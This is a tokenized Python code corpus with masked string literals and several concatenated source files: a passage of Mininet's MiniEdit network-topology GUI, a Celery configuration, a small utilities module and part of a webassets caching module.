<EOL> switchClass = customOvs <EOL> if switchClass == customOvs : <EOL> self . openFlowVersions = [ ] <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> if self . appPrefs [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> self . openFlowVersions . append ( '<STR_LIT>' ) <EOL> protoList = "<STR_LIT:U+002C>" . join ( self . openFlowVersions ) <EOL> switchParms [ '<STR_LIT>' ] = protoList <EOL> newSwitch = net . addSwitch ( name , cls = switchClass , ** switchParms ) <EOL> if switchClass == CustomUserSwitch : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitch . setSwitchIP ( opts [ '<STR_LIT>' ] ) <EOL> if switchClass == customOvs : <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> newSwitch . setSwitchIP ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> if self . checkIntf ( extInterface ) : <EOL> Intf ( extInterface , node = newSwitch ) <EOL> elif '<STR_LIT>' in tags : <EOL> newSwitch = net . addSwitch ( name , cls = LegacySwitch ) <EOL> elif '<STR_LIT>' in tags : <EOL> newSwitch = net . addHost ( name , cls = LegacyRouter ) <EOL> elif '<STR_LIT>' in tags : <EOL> opts = self . hostOpts [ name ] <EOL> ip = None <EOL> defaultRoute = None <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> defaultRoute = '<STR_LIT>' + opts [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in opts and len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> ip = opts [ '<STR_LIT>' ] <EOL> else : <EOL> nodeNum = self . hostOpts [ name ] [ '<STR_LIT>' ] <EOL> ipBaseNum , prefixLen = netParse ( self . appPrefs [ '<STR_LIT>' ] ) <EOL> ip = ipAdd ( i = nodeNum , prefixLen = prefixLen , ipBaseNum = ipBaseNum ) <EOL> if '<STR_LIT>' in opts or '<STR_LIT>' in opts : <EOL> if '<STR_LIT>' in opts : <EOL> hostCls = partial ( CPULimitedHost , <EOL> privateDirs = opts [ '<STR_LIT>' ] ) <EOL> else : <EOL> hostCls = CPULimitedHost <EOL> else : <EOL> if '<STR_LIT>' in opts : <EOL> hostCls = partial ( Host , <EOL> privateDirs = opts [ '<STR_LIT>' ] ) <EOL> else : <EOL> hostCls = Host <EOL> print hostCls <EOL> newHost = net . addHost ( name , <EOL> cls = hostCls , <EOL> ip = ip , <EOL> defaultRoute = defaultRoute <EOL> ) <EOL> if '<STR_LIT>' in opts : <EOL> newHost . setCPUs ( cores = opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> newHost . setCPUFrac ( f = opts [ '<STR_LIT>' ] , sched = opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in opts : <EOL> for extInterface in opts [ '<STR_LIT>' ] : <EOL> if self . checkIntf ( extInterface ) : <EOL> Intf ( extInterface , node = newHost ) <EOL> if '<STR_LIT>' in opts : <EOL> if len ( opts [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' <EOL> self . pathCheck ( '<STR_LIT>' , moduleName = '<STR_LIT>' ) <EOL> moduleDeps ( add = '<STR_LIT>' ) <EOL> elif '<STR_LIT>' in tags : <EOL> opts = self . controllers [ name ] <EOL> controllerType = opts [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in opts : <EOL> controllerProtocol = opts [ '<STR_LIT>' ] <EOL> else : <EOL> controllerProtocol = '<STR_LIT>' <EOL> opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> controllerIP = opts [ '<STR_LIT>' ] <EOL> controllerPort = opts [ '<STR_LIT>' ] <EOL> print '<STR_LIT>' + controllerType <EOL> if controllerType == '<STR_LIT>' : <EOL> net . addController ( name = name , <EOL> controller = RemoteController , <EOL> ip = controllerIP , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> net . addController ( name = name , <EOL> controller = InbandController , <EOL> ip = controllerIP , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> elif controllerType == '<STR_LIT>' : <EOL> net . addController ( name = name , <EOL> controller = OVSController , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> else : <EOL> net . addController ( name = name , <EOL> controller = Controller , <EOL> protocol = controllerProtocol , <EOL> port = controllerPort ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + name ) <EOL> @ staticmethod <EOL> def pathCheck ( * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> moduleName = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for arg in args : <EOL> if not quietRun ( '<STR_LIT>' + arg ) : <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' % arg + <EOL> '<STR_LIT>' % moduleName + <EOL> '<STR_LIT>' ) <EOL> def buildLinks ( self , net ) : <EOL> print "<STR_LIT>" <EOL> for key , link in self . links . iteritems ( ) : <EOL> tags = self . canvas . gettags ( key ) <EOL> if '<STR_LIT:data>' in tags : <EOL> src = link [ '<STR_LIT:src>' ] <EOL> dst = link [ '<STR_LIT>' ] <EOL> linkopts = link [ '<STR_LIT>' ] <EOL> srcName , dstName = src [ '<STR_LIT:text>' ] , dst [ '<STR_LIT:text>' ] <EOL> srcNode , dstNode = net . nameToNode [ srcName ] , net . nameToNode [ dstName ] <EOL> if linkopts : <EOL> net . addLink ( srcNode , dstNode , cls = TCLink , ** linkopts ) <EOL> else : <EOL> net . addLink ( srcNode , dstNode ) <EOL> self . canvas . itemconfig ( key , dash = ( ) ) <EOL> def build ( self ) : <EOL> print "<STR_LIT>" <EOL> dpctl = None <EOL> if len ( self . appPrefs [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> dpctl = int ( self . appPrefs [ '<STR_LIT>' ] ) <EOL> net = Mininet ( topo = None , <EOL> listenPort = dpctl , <EOL> build = False , <EOL> ipBase = self . appPrefs [ '<STR_LIT>' ] ) <EOL> self . buildNodes ( net ) <EOL> self . buildLinks ( net ) <EOL> net . build ( ) <EOL> return net <EOL> def postStartSetup ( self ) : <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newHost = self . net . get ( name ) <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> for vlanInterface in opts [ '<STR_LIT>' ] : <EOL> print '<STR_LIT>' + vlanInterface [ <NUM_LIT:1> ] <EOL> newHost . cmdPrint ( '<STR_LIT>' + name + '<STR_LIT>' + vlanInterface [ <NUM_LIT:1> ] + '<STR_LIT:U+0020>' + vlanInterface [ <NUM_LIT:0> ] ) <EOL> if '<STR_LIT>' in opts : <EOL> newHost . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newNode = self . net . get ( name ) <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> newNode . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> nflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( nflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> nflowEnabled = False <EOL> nflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> print name + '<STR_LIT>' <EOL> nflowSwitches = nflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> nflowEnabled = True <EOL> if nflowEnabled : <EOL> nflowCmd = '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + nflowValues [ '<STR_LIT>' ] <EOL> if nflowValues [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> else : <EOL> nflowCmd = nflowCmd + '<STR_LIT>' <EOL> print '<STR_LIT>' + nflowCmd + nflowSwitches <EOL> call ( nflowCmd + nflowSwitches , shell = True ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' <EOL> sflowValues = self . appPrefs [ '<STR_LIT>' ] <EOL> if len ( sflowValues [ '<STR_LIT>' ] ) > <NUM_LIT:0> : <EOL> sflowEnabled = False <EOL> sflowSwitches = '<STR_LIT>' <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> if opts [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> print name + '<STR_LIT>' <EOL> sflowSwitches = sflowSwitches + '<STR_LIT>' + name + '<STR_LIT>' <EOL> sflowEnabled = True <EOL> if sflowEnabled : <EOL> sflowCmd = '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] + '<STR_LIT:U+0020>' + '<STR_LIT>' + sflowValues [ '<STR_LIT>' ] <EOL> print '<STR_LIT>' + sflowCmd + sflowSwitches <EOL> call ( sflowCmd + sflowSwitches , shell = True ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> else : <EOL> print '<STR_LIT>' <EOL> if self . appPrefs [ '<STR_LIT>' ] == '<STR_LIT:1>' : <EOL> info ( "<STR_LIT>" ) <EOL> CLI ( self . net ) <EOL> def start ( self ) : <EOL> "<STR_LIT>" <EOL> if self . net is None : <EOL> self . net = self . build ( ) <EOL> info ( '<STR_LIT>' % len ( self . net . controllers ) ) <EOL> for controller in self . net . controllers : <EOL> info ( str ( controller ) + '<STR_LIT:U+0020>' ) <EOL> controller . start ( ) <EOL> info ( '<STR_LIT:\n>' ) <EOL> info ( '<STR_LIT>' % len ( self . net . switches ) ) <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> opts = self . switchOpts [ name ] <EOL> switchControllers = [ ] <EOL> for ctrl in opts [ '<STR_LIT>' ] : <EOL> switchControllers . append ( self . net . get ( ctrl ) ) <EOL> info ( name + '<STR_LIT:U+0020>' ) <EOL> self . net . get ( name ) . start ( switchControllers ) <EOL> if '<STR_LIT>' in tags : <EOL> self . net . get ( name ) . start ( [ ] ) <EOL> info ( name + '<STR_LIT:U+0020>' ) <EOL> info ( '<STR_LIT:\n>' ) <EOL> self . postStartSetup ( ) <EOL> def stop ( self ) : <EOL> "<STR_LIT>" <EOL> if self . net is not None : <EOL> for widget in self . widgetToItem : <EOL> name = widget [ '<STR_LIT:text>' ] <EOL> tags = self . canvas . gettags ( self . widgetToItem [ widget ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newHost = self . net . get ( name ) <EOL> opts = self . hostOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> newHost . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in tags : <EOL> newNode = self . net . get ( name ) <EOL> opts = self . switchOpts [ name ] <EOL> if '<STR_LIT>' in opts : <EOL> newNode . cmdPrint ( opts [ '<STR_LIT>' ] ) <EOL> self . net . stop ( ) <EOL> cleanUpScreens ( ) <EOL> self . net = None <EOL> def do_linkPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . linkPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . linkPopup . grab_release ( ) <EOL> else : <EOL> try : <EOL> self . linkRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . linkRunPopup . grab_release ( ) <EOL> def do_controllerPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . controllerPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . controllerPopup . grab_release ( ) <EOL> def do_legacyRouterPopup ( self , event ) : <EOL> if self . net is not None : <EOL> try : <EOL> self . legacyRouterRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . legacyRouterRunPopup . grab_release ( ) <EOL> def do_hostPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . hostPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . hostPopup . grab_release ( ) <EOL> else : <EOL> try : <EOL> self . hostRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . hostRunPopup . grab_release ( ) <EOL> def do_legacySwitchPopup ( self , event ) : <EOL> if self . net is not None : <EOL> try : <EOL> self . switchRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . switchRunPopup . grab_release ( ) <EOL> def do_switchPopup ( self , event ) : <EOL> if self . net is None : <EOL> try : <EOL> self . switchPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . switchPopup . grab_release ( ) <EOL> else : <EOL> try : <EOL> self . switchRunPopup . tk_popup ( event . x_root , event . y_root , <NUM_LIT:0> ) <EOL> finally : <EOL> self . switchRunPopup . grab_release ( ) <EOL> def xterm ( self , _ignore = None ) : <EOL> "<STR_LIT>" <EOL> if ( self . selection is None or <EOL> self . net is None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> name = self . itemToWidget [ self . selection ] [ '<STR_LIT:text>' ] <EOL> if name not in self . net . nameToNode : <EOL> return <EOL> term = makeTerm ( self . net . nameToNode [ name ] , '<STR_LIT>' , term = self . appPrefs [ '<STR_LIT>' ] ) <EOL> if StrictVersion ( MININET_VERSION ) > StrictVersion ( '<STR_LIT>' ) : <EOL> self . net . terms += term <EOL> else : <EOL> self . net . terms . append ( term ) <EOL> def iperf ( self , _ignore = None ) : <EOL> "<STR_LIT>" <EOL> if ( self . selection is None or <EOL> self . net is None or <EOL> self . selection not in self . itemToWidget ) : <EOL> return <EOL> name = self . itemToWidget [ self . selection ] [ '<STR_LIT:text>' ] <EOL> if name not in self . net . nameToNode : <EOL> return <EOL> self . net . nameToNode [ name ] . cmd ( '<STR_LIT>' ) <EOL> def parseArgs ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in sys . argv : <EOL> index = sys . argv . index ( '<STR_LIT>' ) <EOL> if len ( sys . argv ) > index + <NUM_LIT:1> : <EOL> filename = sys . argv [ index + <NUM_LIT:1> ] <EOL> self . parseCustomFile ( filename ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> desc = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> usage = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> opts = OptionParser ( description = desc , usage = usage ) <EOL> addDictOption ( opts , TOPOS , TOPODEF , '<STR_LIT>' ) <EOL> addDictOption ( opts , LINKS , LINKDEF , '<STR_LIT>' ) <EOL> opts . add_option ( '<STR_LIT>' , type = '<STR_LIT:string>' , default = None , <EOL> help = '<STR_LIT>' + <EOL> '<STR_LIT:file>' ) <EOL> self . options , self . args = opts . parse_args ( ) <EOL> if self . args : <EOL> opts . print_help ( ) <EOL> exit ( ) <EOL> def setCustom ( self , name , value ) : <EOL> "<STR_LIT>" <EOL> if name in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> param = name . upper ( ) <EOL> globals ( ) [ param ] . update ( value ) <EOL> elif name == '<STR_LIT>' : <EOL> self . validate = value <EOL> else : <EOL> globals ( ) [ name ] = value <EOL> def parseCustomFile ( self , fileName ) : <EOL> "<STR_LIT>" <EOL> customs = { } <EOL> if os . path . isfile ( fileName ) : <EOL> execfile ( fileName , customs , customs ) <EOL> for name , val in customs . iteritems ( ) : <EOL> self . setCustom ( name , val ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % fileName ) <EOL> def importTopo ( self ) : <EOL> print '<STR_LIT>' + self . options . topo <EOL> if self . options . topo == '<STR_LIT:none>' : <EOL> return <EOL> self . newTopology ( ) <EOL> topo = buildTopo ( TOPOS , self . options . topo ) <EOL> link = customClass ( LINKS , self . options . link ) <EOL> importNet = Mininet ( topo = topo , build = False , link = link ) <EOL> importNet . build ( ) <EOL> c = self . canvas <EOL> rowIncrement = <NUM_LIT:100> <EOL> currentY = <NUM_LIT:100> <EOL> print '<STR_LIT>' + str ( len ( importNet . controllers ) ) <EOL> for controller in importNet . controllers : <EOL> name = controller . name <EOL> x = self . controllerCount * <NUM_LIT:100> + <NUM_LIT:100> <EOL> self . addNode ( '<STR_LIT>' , self . controllerCount , <EOL> float ( x ) , float ( currentY ) , name = name ) <EOL> icon = self . findWidgetByName ( name ) <EOL> icon . bind ( '<STR_LIT>' , self . do_controllerPopup ) <EOL> ctrlr = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : name , <EOL> '<STR_LIT>' : controller . protocol , <EOL> '<STR_LIT>' : controller . ip , <EOL> '<STR_LIT>' : controller . port } <EOL> self . controllers [ name ] = ctrlr <EOL> currentY = currentY + rowIncrement <EOL> print '<STR_LIT>' + str ( len ( importNet . switches ) ) <EOL> columnCount = <NUM_LIT:0> <EOL> for switch in importNet . switches : <EOL> name = switch . name <EOL> self . switchOpts [ name ] = { } <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = self . switchCount <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = '<STR_LIT:default>' <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] = [ ] <EOL> x = columnCount * <NUM_LIT:100> + <NUM_LIT:100> <EOL> self . addNode ( '<STR_LIT>' , self . switchCount , <EOL> float ( x ) , float ( currentY ) , name = name ) <EOL> icon = self . findWidgetByName ( name ) <EOL> icon . bind ( '<STR_LIT>' , self . do_switchPopup ) <EOL> for controller in importNet . controllers : <EOL> self . switchOpts [ name ] [ '<STR_LIT>' ] . append ( controller . name ) <EOL> dest = self . findWidgetByName ( controller . name ) <EOL> dx , dy = c . coords ( self . widgetToItem [ dest ] ) <EOL> self . link = c . create_line ( float ( x ) , <EOL> float ( currentY ) , <EOL> dx , <EOL> dy , <EOL> width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , <EOL> dash = ( <NUM_LIT:6> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT>' , ) ) <EOL> self . addLink ( icon , dest , linktype = '<STR_LIT>' ) <EOL> self . createControlLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> if columnCount == <NUM_LIT:9> : <EOL> columnCount = <NUM_LIT:0> <EOL> currentY = currentY + rowIncrement <EOL> else : <EOL> columnCount = columnCount + <NUM_LIT:1> <EOL> currentY = currentY + rowIncrement <EOL> print '<STR_LIT>' + str ( len ( importNet . hosts ) ) <EOL> columnCount = <NUM_LIT:0> <EOL> for host in importNet . hosts : <EOL> name = host . name <EOL> self . hostOpts [ name ] = { '<STR_LIT>' : '<STR_LIT:host>' } <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = self . hostCount <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = name <EOL> self . hostOpts [ name ] [ '<STR_LIT>' ] = host . IP ( ) <EOL> x = columnCount * <NUM_LIT:100> + <NUM_LIT:100> <EOL> self . addNode ( '<STR_LIT>' , self . hostCount , <EOL> float ( x ) , float ( currentY ) , name = name ) <EOL> icon = self . findWidgetByName ( name ) <EOL> icon . bind ( '<STR_LIT>' , self . do_hostPopup ) <EOL> if columnCount == <NUM_LIT:9> : <EOL> columnCount = <NUM_LIT:0> <EOL> currentY = currentY + rowIncrement <EOL> else : <EOL> columnCount = columnCount + <NUM_LIT:1> <EOL> print '<STR_LIT>' + str ( len ( topo . links ( ) ) ) <EOL> for link in topo . links ( ) : <EOL> print str ( link ) <EOL> srcNode = link [ <NUM_LIT:0> ] <EOL> src = self . findWidgetByName ( srcNode ) <EOL> sx , sy = self . canvas . coords ( self . widgetToItem [ src ] ) <EOL> destNode = link [ <NUM_LIT:1> ] <EOL> dest = self . findWidgetByName ( destNode ) <EOL> dx , dy = self . canvas . coords ( self . widgetToItem [ dest ] ) <EOL> params = topo . linkInfo ( srcNode , destNode ) <EOL> print '<STR_LIT>' + str ( params ) <EOL> self . link = self . canvas . create_line ( sx , sy , dx , dy , width = <NUM_LIT:4> , <EOL> fill = '<STR_LIT>' , tag = '<STR_LIT>' ) <EOL> c . itemconfig ( self . link , tags = c . gettags ( self . link ) + ( '<STR_LIT:data>' , ) ) <EOL> self . addLink ( src , dest , linkopts = params ) <EOL> self . createDataLinkBindings ( ) <EOL> self . link = self . linkWidget = None <EOL> importNet . stop ( ) <EOL> def miniEditImages ( ) : <EOL> "<STR_LIT>" <EOL> return { <EOL> '<STR_LIT>' : BitmapImage ( <EOL> file = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) , <EOL> '<STR_LIT>' : PhotoImage ( data = r"""<STR_LIT>""" ) <EOL> } <EOL> def addDictOption ( opts , choicesDict , default , name , helpStr = None ) : <EOL> """<STR_LIT>""" <EOL> if default not in choicesDict : <EOL> raise Exception ( '<STR_LIT>' % <EOL> ( default , name ) ) <EOL> if not helpStr : <EOL> helpStr = ( '<STR_LIT:|>' . join ( sorted ( choicesDict . keys ( ) ) ) + <EOL> '<STR_LIT>' ) <EOL> opts . add_option ( '<STR_LIT>' + name , <EOL> type = '<STR_LIT:string>' , <EOL> default = default , <EOL> help = helpStr ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> setLogLevel ( '<STR_LIT:info>' ) <EOL> app = MiniEdit ( ) <EOL> app . parseArgs ( ) <EOL> app . importTopo ( ) <EOL> app . mainloop ( ) </s>
<s> from celery import Celery <EOL> from mining . utils import conf <EOL> celery_app = Celery ( <EOL> '<STR_LIT>' , <EOL> broker = conf ( "<STR_LIT>" ) . get ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> backend = conf ( "<STR_LIT>" ) . get ( "<STR_LIT>" , '<STR_LIT>' ) , <EOL> include = [ '<STR_LIT>' ] ) <EOL> celery_app . conf . update ( ** conf ( "<STR_LIT>" ) . get ( "<STR_LIT>" , { } ) ) </s>
<s> import json <EOL> import re <EOL> import os <EOL> import ast <EOL> import unicodedata <EOL> import ConfigParser <EOL> from bson import ObjectId <EOL> from datetime import datetime <EOL> from bottle import request <EOL> from mining . settings import PROJECT_PATH <EOL> def slugfy ( text ) : <EOL> try : <EOL> slug = unicodedata . normalize ( "<STR_LIT>" , text ) . encode ( "<STR_LIT>" , "<STR_LIT:ignore>" ) <EOL> except : <EOL> slug = text <EOL> slug = re . sub ( r"<STR_LIT>" , "<STR_LIT:U+0020>" , slug ) <EOL> slug = "<STR_LIT:->" . join ( slug . lower ( ) . strip ( ) . split ( ) ) <EOL> if not slug : <EOL> return None <EOL> return slug <EOL> def conf ( section , ini = "<STR_LIT>" ) : <EOL> config = ConfigParser . ConfigParser ( ) <EOL> if os . path . isfile ( os . path . join ( PROJECT_PATH , ini ) ) : <EOL> config . read ( os . path . join ( PROJECT_PATH , ini ) ) <EOL> else : <EOL> config . read ( os . path . join ( PROJECT_PATH , "<STR_LIT>" ) ) <EOL> _dict = { } <EOL> options = config . options ( section ) <EOL> for option in options : <EOL> try : <EOL> _dict [ option ] = ast . literal_eval ( config . get ( section , option ) ) <EOL> except : <EOL> try : <EOL> _dict [ option ] = config . get ( section , option ) <EOL> except : <EOL> _dict [ option ] = None <EOL> return _dict <EOL> def log_it ( s , name = u"<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" . format ( name ) , "<STR_LIT:a>" ) as log : <EOL> msg = u"<STR_LIT>" . format ( datetime . now ( ) , s ) <EOL> log . write ( msg . encode ( '<STR_LIT:utf-8>' ) ) <EOL> def parse_dumps ( obj ) : <EOL> if isinstance ( obj , datetime ) : <EOL> return str ( obj . strftime ( "<STR_LIT>" ) ) <EOL> if isinstance ( obj , ObjectId ) : <EOL> return str ( obj ) <EOL> return json . JSONEncoder . default ( obj ) <EOL> def __from__ ( path ) : <EOL> try : <EOL> _import = path . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> _from = u"<STR_LIT:.>" . join ( path . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> return getattr ( __import__ ( _from , fromlist = [ _import ] ) , _import ) <EOL> except TypeError : <EOL> return object <EOL> def query_field ( f ) : <EOL> ret = { } <EOL> value = request . GET . get ( f ) <EOL> if value : <EOL> s = f . split ( '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:action>' ] = s [ <NUM_LIT:0> ] <EOL> ret [ '<STR_LIT>' ] = s [ <NUM_LIT:1> ] <EOL> ret [ '<STR_LIT>' ] = s [ <NUM_LIT:2> ] <EOL> ret [ '<STR_LIT:value>' ] = value <EOL> return ret </s>
<s> __version__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from os import path <EOL> import errno <EOL> import tempfile <EOL> import warnings <EOL> from webassets import six <EOL> from webassets . merge import BaseHunk <EOL> from webassets . filter import Filter , freezedicts <EOL> from webassets . utils import md5_constructor , pickle <EOL> import types <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> def make_hashable ( data ) : <EOL> """<STR_LIT>""" <EOL> return freezedicts ( data ) <EOL> def make_md5 ( * data ) : <EOL> """<STR_LIT>""" <EOL> def walk ( obj ) : <EOL> if isinstance ( obj , ( tuple , list , frozenset ) ) : <EOL> for item in obj : <EOL> for d in walk ( item ) : yield d <EOL> elif isinstance ( obj , ( dict ) ) : <EOL> for k in sorted ( obj . keys ( ) ) : <EOL> for d in walk ( k ) : yield d <EOL> for d in walk ( obj [ k ] ) : yield d <EOL> elif isinstance ( obj , BaseHunk ) : <EOL> yield obj . data ( ) . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , int ) : <EOL> yield str ( obj ) . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , six . text_type ) : <EOL> yield obj . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , six . binary_type ) : <EOL> yield obj <EOL> elif hasattr ( obj , "<STR_LIT:id>" ) : <EOL> for i in walk ( obj . id ( ) ) : <EOL> yield i <EOL> elif obj is None : <EOL> yield "<STR_LIT:None>" . encode ( '<STR_LIT:utf-8>' ) <EOL> elif isinstance ( obj , types . FunctionType ) : <EOL> yield str ( hash ( obj ) ) . encode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % type ( obj ) ) <EOL> md5 = md5_constructor ( ) <EOL> for d in walk ( data ) : <EOL> md5 . update ( d ) <EOL> return md5 . hexdigest ( ) <EOL> def safe_unpickle ( string ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return pickle . loads ( string ) <EOL> except : <EOL> return None <EOL> class BaseCache ( object ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , key ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def set ( self , key , value ) : <EOL> raise NotImplementedError ( ) <EOL> class MemoryCache ( BaseCache ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , capacity ) : <EOL> self . capacity = capacity <EOL> self . keys = [ ] <EOL> self . cache = { } <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return False == other or None == other or id ( self ) == id ( other ) <EOL> def get ( self , key ) : <EOL> key = make_md5 ( make_hashable ( key ) ) <EOL> return self . cache . get ( key , None ) <EOL> def set ( self , key , value ) : <EOL> key = make_md5 ( make_hashable ( key ) ) <EOL> self . cache [ key ] = value <EOL> try : <EOL> self . keys . remove ( key ) <EOL> 